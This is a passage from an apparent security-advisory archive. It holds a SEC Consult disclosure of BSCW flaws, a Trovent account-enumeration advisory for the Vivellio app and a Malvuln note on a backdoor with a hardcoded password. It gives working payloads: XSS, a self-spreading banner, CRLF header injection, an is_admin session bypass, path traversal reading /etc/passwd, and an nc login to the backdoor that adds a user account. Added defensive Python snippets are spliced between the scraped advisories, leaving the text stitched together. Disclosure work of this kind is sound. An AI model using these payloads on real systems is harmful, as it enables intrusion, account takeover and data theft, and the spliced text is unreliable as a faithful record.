alert(document.domain)">foo</div><br />-------------------------------------------------------------------------------<br />uses only valid tags and attributes. As it contains `Dojo`-specific attributes<br />it is processed by `Dojo`, which results in executing the provided `JavaScript`<br />code. 
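Items 1, 3 and 5 above pass user input into a file path or a response header with at most a deny-list in between, and item 2 filters attributes with a deny-list that `data-dojo-*` slips past. The following Python is an added example, not BSCW code or the advisory's: it shows why `replace("../", "")` is defeated by `....//`, and how a realpath containment check, a local-path-only `returnto` and an attribute allow-list handle the same inputs. The template directory `/opt/bscw/templates`, the `ALLOWED_ATTRS` set and the `URL_SCHEMES` set are assumptions made for the example.

```python
"""Defender-side handling of the BSCW input patterns discussed above (items 1, 2, 3 and 5).
Added example: not code from the advisory or from BSCW."""
import os

# Assumed template directory for the example; BSCW's real layout is not given on the page.
TEMPLATE_DIR = "/opt/bscw/templates"
# Assumed attribute allow-list; BSCW's `ValidElements` list is not reproduced on the page.
ALLOWED_ATTRS = {"href", "title", "class", "id", "src", "alt"}
URL_SCHEMES = {"http", "https", "mailto"}


def naive_sanitize(value: str) -> str:
    """The advisory's only defence for `template`: one pass of replace("../", "")."""
    return value.replace("../", "")


def resolve_under(base_dir: str, user_value: str) -> str:
    """Resolve base_dir/user_value and refuse anything whose real path leaves base_dir.
    The check runs on the final, normalised path, so earlier string tricks do not matter."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"{user_value!r} escapes {base_dir}")
    return candidate


def escapes_base(base_dir: str, user_value: str) -> bool:
    """True when resolve_under would reject the value."""
    try:
        resolve_under(base_dir, user_value)
    except ValueError:
        return True
    return False


def safe_return_to(value: str, default: str = "/") -> str:
    """Accept only a local absolute path for the `Location` header; anything else falls back.
    CR, LF and NUL are refused first because they would start a new header line (3.2);
    `//host` and backslashes are refused because browsers treat them as a new origin (3.1)."""
    if any(ch in value for ch in "\r\n\x00"):
        return default
    if not value.startswith("/") or value.startswith("//") or "\\" in value:
        return default
    return value


def attribute_allowed(name: str, value: str) -> bool:
    """Allow-list replacement for the `on*` / `javascript:` deny-list described in item 2.
    Unknown names such as data-dojo-type are refused by default; URL-bearing attributes are
    checked after removing whitespace and control characters and lower-casing the scheme."""
    name = name.lower()
    if name not in ALLOWED_ATTRS:
        return False
    if name in {"href", "src"}:
        cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace()).lower()
        before_path = cleaned.split("/", 1)[0]
        if ":" in before_path:
            return before_path.split(":", 1)[0] in URL_SCHEMES
    return True


if __name__ == "__main__":
    bypass = naive_sanitize("....//....//etc/passwd")
    print("after replace('../', ''):", bypass)
    print("realpath check rejects it:", escapes_base(TEMPLATE_DIR, bypass))
    print("returnto with CRLF becomes:", safe_return_to("/\r\nSet-Cookie: Foo=bar"))
    print("data-dojo-props allowed:", attribute_allowed("data-dojo-props", "onClick: alert(1)"))
```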
Although the attribute name of the payload is `onClick`, it is triggered<br />just by visiting the site.<br /><br />As it is possible to change the banner of shared objects like folders, a<br />malicious user can weaponize a banner that is shared with other people and<br />include a self-spreading payload. Once other users with access to the folder<br />visit it, the payload is triggered and can copy itself into all other shared<br />folders the victim has access to.<br /><br /><br />3) Multiple HTTP header attacks<br /><br />3.1) Open redirect<br />The `Location` header can point to any URL, which forces the<br />user's browser to navigate to an attacker-controlled site.<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/306?op=login&returnto=https://www.example.com HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Cookie: _pub_bscws="88522409e1509f61abbbf230eed829ad:2"<br />Upgrade-Insecure-Requests: 1<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 303 See Other<br />Date: Thu, 02 Sep 2021 20:24:28 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Thu, 02 Sep 2021 18:24:28 GMT<br />Location: https://www.example.com<br />Content-Type: text/html; charset=UTF-8<br />-------------------------------------------------------------------------------<br /><br />3.2) Header injection<br />As there is no validation at all, it is also possible to 
inject `\r\n` which<br />allows an attacker to "create" new HTTP headers in the response. This can for<br />example be abused to set new cookies.<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/306?op=login&returnto=/%0d%0aSet-Cookie:%20Foo=bar<br />...<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 303 See Other<br />Date: Thu, 02 Sep 2021 20:29:17 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Thu, 02 Sep 2021 18:29:17 GMT<br />Location: http://bscw.local:8080/<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 2425<br />Set-Cookie: _pub_bscws="6a0d3c1b6810d47d4f57662f9993fceb:2"; expires=Tue, 23 Feb 2027 20:29:17 GMT; httponly; Path=/pub/; Version=1<br />Set-Cookie: Foo=bar<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />-------------------------------------------------------------------------------<br /><br /><br />4) Session object manipulation allows to bypass entering the password for<br />admin actions<br /><br />After logging in with an admin account the `Admin` menu is disabled.<br /><br />Set the `is_admin` attribute in the user session:<br /><br />-------------------------------------------------------------------------------<br />POST /sec/bscw.cgi/30 HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: curl/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Referer: http://bscw.local:8080/pub/bscw.cgi/30<br />Cookie: MicroblogSlidingPanelDisplayState=%22hidden%22; MicroblogInboxIndicatorState=%5B0%2C0%5D; bscw_auth="8Uf4+dFG/DGjTdFBFFFVZORIEMH1TthB:33"; <br 
/>_sec_bscws="fa275d74b9ddb381ea238fb9e62578dd:51"<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 60<br /><br />op=copylink&id=30&noflash=1&session=is_admin&_ok_.x=+++OK+++<br />-------------------------------------------------------------------------------<br /><br />After issuing the above request the `Admin` menu is enabled, without entering<br />the user password.<br /><br /><br />5) Unauthenticated LFI<br /><br />Getting the `/etc/passwd` file via the public interface:<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Cookie: MicroblogInboxIndicatorState=%5B1630932508%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; <br />_sec_bscws="ce8ee39692303f447b50560277dd49f9:51"; bscw_auth="Gpx4/TavfN/lApZ7kyIwEH+Fy4aDTdhB:33"; _pub_bscws="6137c54f:0"<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 CSS<br />Date: Tue, 07 Sep 2021 20:02:35 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Tue, 07 Sep 2021 18:02:35 GMT<br />Content-Type: text/css<br />Vary: Accept-Encoding<br />Content-Length: 1049<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br /><br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br 
/>sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />openldap:x:101:102:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />bscw:x:999:999:BSCW system user:/opt/bscw:/bin/bash<br />-------------------------------------------------------------------------------<br /><br />6) Unauthenticated reflected XSS - refresh<br /><br />Getting an alert box:<br /><br />-------------------------------------------------------------------------------<br />GET <br />/pub/bscw.cgi/30?op=refresh&notify=1&notify_args=_type&notify_args=body&notify_args=mimetype&notify_args=encoding&encoding=utf-8%0d%0afoo:%20bar&mimetype=text/html&_type=body&body=<@urlencode><script>alert(document.domain)</script><@/urlencode> <br />HTTP/1.1<br /><br /><br />Response:<br /><br />HTTP/1.1 200 bscw_dialog<br />Date: Fri, 10 Sep 2021 21:16:35 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Fri, 10 Sep 2021 19:16:35 GMT<br />Content-Type: text/html<br />Content-Length: 39<br />Set-Cookie: _pub_bscws="327c299e8c460787f98700155696c946:2"; expires=Wed, 03 Mar 2027 21:16:35 GMT; httponly; Path=/pub/; Version=1<br />Keep-Alive: 
timeout=5, max=100<br />Connection: Keep-Alive<br /><br /><script>alert(document.domain)</script><br />-------------------------------------------------------------------------------<br /><br />7) Unauthenticated reflected XSS - upload_browser<br /><br />The value gets written to the following block:<br /><br />-------------------------------------------------------------------------------<br /><script type="text/javascript"><br />//<![CDATA[<br /><br />function CloseWindow(){<br />window.close();<br />}<br />function SetUrl(url){<br />window.opener.CKEDITOR.tools.callFunction(INJECT_ME, '.');<br />// ^^^ Clear protocol field<br />window.opener.CKEDITOR.tools.callFunction(INJECT_ME, url);<br />}<br />// ....<br /><br />//]]><br /></script><br />-------------------------------------------------------------------------------<br />To escape the function call and keep the `JavaScript` code valid, which is<br />required to get executed, the following payload can be used:<br /><br />`foo)};alert(document.domain);function%20a(){m(a`<br /><br />The resulting code looks like this:<br /><br />-------------------------------------------------------------------------------<br /><script type="text/javascript"><br />//<![CDATA[<br /><br />function CloseWindow(){<br />window.close();<br />}<br />function SetUrl(url){<br />window.opener.CKEDITOR.tools.callFunction(foo)};alert(document.domain);function a(){m(a, '.');<br />// ^^^ Clear protocol field<br />window.opener.CKEDITOR.tools.callFunction(foo)};alert(document.domain);function a(){m(a, url);<br />}<br />//..<br />//]]><br /></script><br />-------------------------------------------------------------------------------<br /><br /><br />8) Unauthenticated user enumeration<br /><br />If the verification of the token fails, an error message is shown to the user<br />that he needs to re-authenticate. 
This message does contain the username if the<br />provided `USERID` is valid.<br /><br />-------------------------------------------------------------------------------<br />GET /sec/bscw.cgi/2 HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Cookie: _sec_bscws="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:264"<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br /><p class="hint"><br />Authenticate yourself for BSCW Shared Workspace Server (sec) at bscw.local.<br /><br /><br /><a href="/pub/bscw.cgi?op=chpwd">Forgot your password?</a><br /></p><br /><table width="100%" border="0" cellspacing="0" cellpadding="0"><br /><tr><br /><th scope="row"><br /><label for="uname">User name:</label><br /></th><br /><td><br /><span class="strong">foo</span><br /><input type="hidden" name="username" value="foo" /><br /><br /></td><br /></tr><br /><tr><br /><th scope="row"><br /><label for="pwd">Password:</label><br /></th><br /><td><br /><input class="inputfield" id="pwd" size="40" type="password" name="passwd" value="" /><br /></td><br /></tr><br />-------------------------------------------------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />BSCW Classic 5.2.4 was used to find the vulnerability.<br />The vendor confirmed that the following versions are also affected by the vulnerability:<br /><br />BSCW Server 5.0.11, 5.1.9, 5.2.4, 7.3.2, <=7.4.3<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-09-11: Sent report to vendor<br />2021-09-12: Vendor confirmed 
the issue and is working on a patch<br />2021-11-13: Vendor notified licensed customers about the issue and a patch<br />2021-11-25: Requesting CVE numbers (Mitre)<br />2021-11-26: Got email confirmation from Mitre, but no CVE numbers yet<br />2021-11-29: Scheduled advisory release for 2021-12-01, coordinated with vendor<br />2021-12-01: Postponing release because of missing CVE numbers (asked again)<br />2021-12-02: Release of security advisory without CVE numbers.<br /><br /><br />Solution:<br />---------<br />The vendor provides patched versions v5.2.5 and v7.4.4 for the affected and<br />supported products, which should be installed immediately.<br /><br />https://www.bscw.de/social/#download<br />https://www.bscw.de/classic/#download<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence, our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Armin Stock / @2021<br /><br /><br /></code></pre>
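Hardened counterparts for the three BSCW parameters abused in sections 3, 4 and 5 above (`returnto`, `session` and `style_name`), as an added example that is not part of the SEC Consult advisory or of BSCW's code: the parameter names come from the advisory, while the helper names, the default landing page, the session-key allowlist and the theme directory are assumptions.

```python
"""Hardened handling of the three BSCW parameters abused above: `returnto`
(section 3), `session` (section 4) and `style_name` (section 5)."""
import os
import re
from urllib.parse import urlsplit

DEFAULT_TARGET = "/pub/bscw.cgi"   # assumed landing page, not from the advisory


def safe_returnto(value, default=DEFAULT_TARGET):
    """Return a redirect target that is safe to put in a Location header.

    `value` is the already URL-decoded parameter.  Anything that could carry
    header injection (CR, LF, NUL) or leave the site (a scheme, a host, a
    protocol-relative '//host', or a backslash, which browsers treat as '/')
    falls back to `default`.
    """
    if not value or any(c in value for c in "\r\n\x00\\"):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or not value.startswith("/"):
        return default
    return value


# Only these keys may be set through a user-supplied `session=` parameter;
# privilege flags such as is_admin are deliberately not on the list.
USER_SETTABLE_SESSION_KEYS = frozenset({"noflash", "lang", "tz"})


def session_update_allowed(key):
    return key in USER_SETTABLE_SESSION_KEYS


def set_session_attr(session, key, value=True):
    """Allowlisted session update; refuses is_admin and any unknown key."""
    if not session_update_allowed(key):
        raise PermissionError("session attribute %r is not user-settable" % key)
    session[key] = value
    return session


# A theme name is a plain identifier, so '../' and '/' never reach the
# filesystem join; the realpath comparison is defence in depth.
_STYLE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def safe_theme_path(style_name, theme_dir):
    """Resolve `style_name` inside `theme_dir`, or return None."""
    if not style_name or not _STYLE_NAME.match(style_name):
        return None
    base = os.path.realpath(theme_dir)
    candidate = os.path.realpath(os.path.join(base, style_name))
    if os.path.dirname(candidate) != base:
        return None
    return candidate


if __name__ == "__main__":
    # The advisory's own inputs, URL-decoded, against the hardened helpers.
    print(safe_returnto("https://www.example.com"))      # /pub/bscw.cgi
    print(safe_returnto("/\r\nSet-Cookie: Foo=bar"))      # /pub/bscw.cgi
    print(session_update_allowed("is_admin"))             # False
    print(safe_theme_path("../../../../../../../../etc/passwd",
                          "/opt/bscw/themes"))            # None
```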
<pre><code># Trovent Security Advisory 2108-01 #<br />#####################################<br /><br /><br />User account enumeration in password reset function<br />###################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2108-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2108-01<br />Affected product: Vivellio Android mobile application (com.netural.vivellio)<br />Tested versions: Vivellio 1.2.1<br />Vendor: blockhealth GmbH, https://www.vivellio.app<br />Credits: Trovent Security GmbH, Karima Hebbal<br /><br /><br />Detailed description<br />####################<br /><br />The Vivellio mobile application is used to store health information.<br />Trovent Security GmbH discovered a user account enumeration vulnerability in<br />the password reset function of the Vivellio mobile application.<br />The Vivellio server API allows checking if a user with a specific email address<br />is registered or not.<br /><br />Severity: Medium<br />CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CWE ID: CWE-204<br />CVE ID: N/A<br /><br /><br />Proof of concept<br />################<br /><br />Sample HTTP request sent with a non-registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />POST /user/reset-password HTTP/1.1<br />Host: app-gate.vivellio.app<br />Accept: application/json<br />Content-Type: application/json; charset=UTF-8<br />Content-Length: 28<br />Accept-Encoding: gzip, deflate<br />User-Agent: okhttp/3.14.1<br />Connection: close<br /><br /><br />{"email":"false@gmail.com"}<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />The server response to an invalid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/1.1 404 <br /><br 
/>Cache-Control: no-cache, no-store, max-age=0, must-revalidate<br />Content-Type: application/json;charset=UTF-8<br />Date: Mon, 30 Aug 2021 11:26:59 GMT<br />Expires: 0<br />Pragma: no-cache<br />Server: openresty/1.15.8.1<br />Vary: Accept-Encoding<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: DENY<br />X-XSS-Protection: 1; mode=block<br />Content-Length: 1437<br />Connection: Close<br /><br /><br />{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"createPasswordResetProcess","fileName":"UserControllerImpl.java","lineNumber":539,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserControllerImpl.java","lineNumber":85,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserServiceImpl.java","lineNumber":52,"className":"ai.blockhealth.carify.user.service.UserServiceImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserApi.java","lineNumber":61,"className":"ai.blockhealth.carify.user.UserApi","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"doFilterInternal","fileName":"VivellioRequestLogger.java","lineNumber":56,"className":"ai.blockhealth.carify.filter.VivellioRequestLogger","nativeMethod":false}],<br />"message":"The email false@gmail.com could not be linked to an existing account.","suppressed":[],"localizedMessage":"The email false@gmail.com could not be linked to an existing account.","exceptionClass":"EmailNotFoundException"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br 
/>Solution / Workaround<br />#####################<br /><br />Ensure the application returns a consistent message for both existent and<br />nonexistent accounts during the password reset process.<br /><br />Fixed in Vivellio server API, verified by Trovent.<br /><br /><br />History<br />#######<br /><br />2021-08-30: Vulnerability found & advisory created<br />2021-09-24: Vendor contacted<br />2021-09-27: Vendor replied<br />2021-12-18: Vendor reported that the vulnerability is fixed<br />2022-01-26: Trovent verified the fix of the vulnerability<br />2022-02-03: Advisory published<br /></code></pre>
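A reset handler that answers identically for registered and unregistered addresses and never serialises an exception into the response, as an added example that is neither Vivellio's code nor Trovent's: the sample user table, the helper names and the mail outbox are assumptions, while the exception name and the error message text follow the advisory.

```python
"""Password-reset handling that does not reveal account existence and never
serialises exceptions into the response (the two leaks in the advisory)."""
import json
import secrets

# Constructed sample user table; not real accounts.
USERS = {"alice@example.org": {"id": 1}}

GENERIC_RESPONSE = (200, {"message": "If the address is registered, a "
                                     "password reset e-mail has been sent."})


class EmailNotFoundException(Exception):
    """Stand-in for the server-side exception class named in the advisory."""


def leaky_reset(body, users=USERS, outbox=None):
    """The pattern the advisory describes: an unknown address raises, and the
    framework turns that into a 404 carrying the message and a stack trace."""
    email = json.loads(body)["email"]
    if email not in users:
        raise EmailNotFoundException(
            "The email %s could not be linked to an existing account." % email)
    token = secrets.token_urlsafe(32)
    if outbox is not None:
        outbox.append((email, token))
    return 200, {"message": "Password reset e-mail sent."}


def safe_reset(body, users=USERS, outbox=None):
    """Same status, same body and the same visible work on both paths.

    The token is generated before the lookup so the work done does not depend
    on whether the address exists; the actual mail delivery belongs in a
    background queue so response time cannot leak the answer either.
    """
    try:
        email = json.loads(body).get("email")
    except (ValueError, AttributeError):
        email = None
    token = secrets.token_urlsafe(32)
    if isinstance(email, str) and email.strip().lower() in users:
        if outbox is not None:
            outbox.append((email.strip().lower(), token))
    return GENERIC_RESPONSE


def handle_reset_request(body, handler=safe_reset):
    """Framework-level guard: no exception class, message or stack trace
    reaches the client, whichever handler is wired in."""
    try:
        return handler(body)
    except Exception as exc:
        _log_server_side(exc)          # details stay in the server log
        return 500, {"message": "Internal error"}


def _log_server_side(exc):
    # Placeholder for the real logger (assumption, not Vivellio code).
    pass
```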
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8170928cd3e0f1a79b9d40ae19a4d217.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.WinShell.50<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 1990. Authentication is required for remote user access. However, the password "tdkhbhhesdth" is weak and hardcoded within the executable. <br />Type: PE32<br />MD5: 8170928cd3e0f1a79b9d40ae19a4d217<br />Vuln ID: MVID-2021-0416<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1990<br />WeLCoMe to X-FileZzZ & The^GoBLiN PubStro plz press password :tdkhbhhesdth<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\dump>net user MALVULN hell /add<br />net user MALVULN hell /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>